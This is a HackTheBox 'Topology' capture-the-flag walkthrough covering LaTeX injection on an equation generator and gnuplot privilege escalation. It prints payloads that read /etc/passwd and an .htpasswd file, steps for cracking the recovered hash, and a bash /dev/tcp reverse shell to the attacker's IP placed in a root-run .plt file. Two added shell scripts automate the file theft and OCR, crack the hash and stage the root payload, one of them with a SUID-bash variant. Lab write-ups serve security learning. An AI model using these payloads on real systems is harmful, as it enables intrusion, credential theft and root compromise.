HackTheBox : Topology

#$ubh@nk@r
5 min read · Jun 21, 2023


Intro:

It is an Easy machine, but there are new things to learn here: LaTeX injection and a gnuplot privilege escalation. So let's jump into the machine without delay.

Nmap Scan :

So as usual I start with an Nmap scan.

Tip : nmap -sVC -T4 <ip> -vv

(Nmap scan output, screenshot)

WEB Enumeration :

Two ports are open: 22 (OpenSSH) and 80 (Apache 2.4.41). So let's visit the website first.

This is a university website listing some professors. In the email section I found the domain name 'topology.htb', so I added it to my '/etc/hosts' file. I thought there might be subdomains, so I started a Gobuster scan for subdomain (vhost) enumeration. (Recent Gobuster releases also need '--append-domain', otherwise the wordlist entries are sent without the '.topology.htb' suffix and nothing matches.)

Tip : gobuster vhost -u http://topology.htb/ -w <path_of_subdomain_list>

And I got two subdomains: 'dev.topology.htb' (401 Unauthorized) and 'stats.topology.htb' (accessible). So I added them to my hosts file as well. Back on the main website, I found a 'LaTeX Equation Generator' link, which redirects to another subdomain, 'latex.topology.htb'; I added that one to the hosts file too and visited it.

There is an input field that renders the submitted equation into a .png file. Since the input is LaTeX code (as in the example shown on the page), I suspect LaTeX injection or something similar. Let's check!

User Access :

So in the input field I enter the following command:

Tip : \lstinputlisting{/etc/passwd}

Tip : Go to this website → https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection for more Information!

After that I got this output :)

It is not executed and we get blocked. Maybe there is some kind of filter or WAF on the input, I don't know, but as hackers we have to bypass it :)

I put a '$' sign at the start and at the end of the input, so the command is submitted as inline math:

Tip : $\lstinputlisting{/etc/passwd}$

And yes!!! I got the '/etc/passwd' file. So we have arbitrary file read on the server: the LaTeX is compiled server-side and the file contents end up in the rendered image. This is something new for me. :)

So what next? I visit the 'dev.topology.htb' page, which needs HTTP authentication.

We can abuse that with the LaTeX injection. The vhost is probably served from a 'dev' directory under the web root on the victim machine, and Apache keeps the username and password hash for that page in a '.htpasswd' file there. So let's try.

Tip : /var/www/dev/.htpasswd

Tip : $\lstinputlisting{/var/www/dev/.htpasswd}$

And I get the username and the password hash.

That's amazing. Since the output is an image, I converted it to text with an online image-to-text (OCR) tool.

Then I cracked the .htpasswd hash offline (john and hashcat both recognise the Apache htpasswd formats) and got the password. It is one of the most interesting passwords I have ever seen :)

So I tried SSH with those credentials and got my first user access and the 'user_flag'.
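The following script is an added example, not code from the original post: it automates the `$\lstinputlisting{...}$` file read above for several paths, OCRs the returned image and hands the .htpasswd line to john. Everything about the target endpoint is an assumption not stated in the post: the generator is assumed to live at `http://latex.topology.htb/equation.php` and to take the LaTeX source in an `eqn` query parameter, so adjust `LATEX_URL` and the parameter name to whatever the form actually submits. The wordlist path is also an assumption.

```shell
#!/bin/sh
# Added example (not from the original post): automate the LaTeX file read
# against the equation generator. ASSUMPTIONS (not on the page): the endpoint
# below and the "eqn" parameter name. Adjust both to the real form.
LATEX_URL="${LATEX_URL:-http://latex.topology.htb/equation.php}"

# Build the payload. The bare \lstinputlisting was rejected, so wrap it in
# $...$ (inline math mode), exactly as in the post.
latex_read_payload() {
  printf '$\\lstinputlisting{%s}$' "$1"
}

# Fetch the rendered PNG for one file. -G turns --data-urlencode into a GET
# query string and URL-encodes the '\', '{', '}' and '$' characters for us.
fetch_file_as_png() {
  path=$1
  out=$2
  curl -sS -G "$LATEX_URL" --data-urlencode "eqn=$(latex_read_payload "$path")" -o "$out"
}

# The hash comes back as an image; OCR it if tesseract is installed, otherwise
# retype it carefully (one wrong character and the hash will never crack).
png_to_text() {
  png=$1
  if command -v tesseract >/dev/null 2>&1; then
    tesseract "$png" stdout 2>/dev/null
  else
    echo "tesseract not found; transcribe $png by hand" >&2
    return 1
  fi
}

# Crack an .htpasswd line (user:hash) offline. john auto-detects the Apache
# htpasswd hash formats. Wordlist path is an assumption.
crack_htpasswd() {
  hashfile=$1
  john --wordlist="${WORDLIST:-/usr/share/wordlists/rockyou.txt}" "$hashfile"
  john --show "$hashfile"
}

# Only talk to the target when invoked as: sh latex_read.sh run
if [ "${1:-}" = "run" ]; then
  for f in /etc/passwd /var/www/dev/.htpasswd; do
    name=$(echo "$f" | tr '/' '_')
    fetch_file_as_png "$f" "out$name.png"
    png_to_text "out$name.png" > "out$name.txt" || true
  done
  cp out_var_www_dev_.htpasswd.txt htpasswd.txt && crack_htpasswd htpasswd.txt
fi
```

Check the OCR output against the image before cracking: a misread character in the salt or hash (`l` vs `1`, `O` vs `0`) is the usual reason a known-weak .htpasswd hash refuses to crack.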

Privilege Escalation :

So it's time for some privilege escalation. Let's check which processes are running using 'pspy64'. Download it into '/dev/shm' or '/tmp' on the target, since both are world-writable.

Tip : pspy64 link → https://github.com/DominicBreuker/pspy

I saw a process running 'gnuplot'.

GNUPLOT

Gnuplot is a command-line and GUI program that can generate two- and three-dimensional plots of functions, data, and data fits. The program runs on all major computers and operating systems.

So let's go to '/opt/gnuplot'.

I saw the 'gnuplot' directory is writable, so I create a reverse shell payload with the .plt extension. The content looks like this:

We only need the first line, gnuplot's system "command string" call, with 'command string' replaced by a reverse shell command.

Tip : “/bin/bash -c ‘bash -i >& /dev/tcp/<tun0_ip>/9001 0>&1’”

Put the above command in your .plt file, save it in '/opt/gnuplot', and start a Netcat listener on the chosen port. After some time, when the root process that pspy showed picks up the file, you will get a shell as root.
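The following script is an added example, not code from the original post: it generates the one-line .plt payload from the post, checks that the drop directory really is writable, and writes the file. The directory `/opt/gnuplot` and the `.plt` extension come from the post; the attacker IP and port, the file name `rev.plt` and the listener command are assumptions. It also goes one step beyond the post with a second payload that creates a SUID copy of bash instead of a reverse shell, which is the same primitive (gnuplot's `system` runs the string as root) without needing a listener.

```shell
#!/bin/sh
# Added example (not from the original post): stage the gnuplot privesc.
# /opt/gnuplot and the .plt extension are from the post; IP, port, file name
# and the listener are assumptions.
PLT_DIR="${PLT_DIR:-/opt/gnuplot}"

# gnuplot's `system "command string"` hands the string to /bin/sh, so any .plt
# the root job loads becomes arbitrary command execution as root.
make_plt() {
  ip=$1
  port=$2
  cat <<EOF
system "/bin/bash -c 'bash -i >& /dev/tcp/${ip}/${port} 0>&1'"
EOF
}

# Quieter alternative that needs no listener: a root-owned SUID copy of bash.
# Run "/tmp/rootbash -p" afterwards to keep euid 0.
make_suid_plt() {
  cat <<'EOF'
system "cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash"
EOF
}

# Confirm the directory really is writable before dropping anything in it.
plt_dir_writable() {
  [ -d "$1" ] && [ -w "$1" ]
}

# Only writes the payload when invoked as: sh gnuplot_privesc.sh <ip> <port>
if [ "$#" -eq 2 ]; then
  plt_dir_writable "$PLT_DIR" || { echo "$PLT_DIR is not writable" >&2; exit 1; }
  make_plt "$1" "$2" > "$PLT_DIR/rev.plt"
  echo "dropped $PLT_DIR/rev.plt; now run on the attacker box: nc -lvnp $2"
fi
```

Remove the .plt file once you have your shell; otherwise every run of the scheduled job will keep firing the payload at your listener.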

That's how I pwned this machine. I learned two things here: LaTeX injection and privilege escalation with gnuplot.

Thanks For Reading!

Happy Hacking~


Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/
